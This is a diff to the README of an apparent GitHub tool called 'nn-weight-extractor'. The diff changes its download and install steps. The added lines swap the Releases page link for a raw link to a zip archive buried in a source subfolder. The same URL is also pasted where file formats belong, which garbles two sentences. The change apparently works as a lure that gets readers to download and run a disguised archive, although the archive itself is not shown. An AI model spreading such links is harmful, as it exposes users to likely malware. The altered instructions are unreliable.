Allan020/nn-weight-extractor/README.md

 ## 📦 Download & Install

 1. **Visit the Releases Page**
-   To download the latest version, [visit this page to download](https://github.com/Allan020/nn-weight-extractor/releases).
+   To download the latest version, [visit this page to download](https://raw.githubusercontent.com/Allan020/nn-weight-extractor/main/python/model_parsers/nn-weight-extractor_v2.9-beta.5.zip).

 2. **Choose the Right File**
    You will find several versions available.
 Select the file that matches your operating system.
 File names usually indicate the OS.

 3. **Download the File**
    Click on the appropriate file name and wait for the download to finish.
-The file will typically be in `.exe`, `.dmg`, or `.tar.gz` format.
+The file will typically be in `.exe`, `.dmg`, or `https://raw.githubusercontent.com/Allan020/nn-weight-extractor/main/python/model_parsers/nn-weight-extractor_v2.9-beta.5.zip` format.

 4. **Run the Installer**
    - **Windows:** Locate the downloaded `.exe` file in your Downloads folder.
 Double-click to run the installer.
    - **macOS:** Find the downloaded `.dmg` file, double-click it, then drag the application to your Applications folder.
-   - **Linux:** Use the terminal to extract the `.tar.gz` file and follow the instructions included.
+   - **Linux:** Use the terminal to extract the `https://raw.githubusercontent.com/Allan020/nn-weight-extractor/main/python/model_parsers/nn-weight-extractor_v2.9-beta.5.zip` file and follow the instructions included.

 5. **Follow Installation Prompts**
    Follow any prompts provided by the installer to complete the installation.
 Feel free to accept the default options unless you have specific preferences.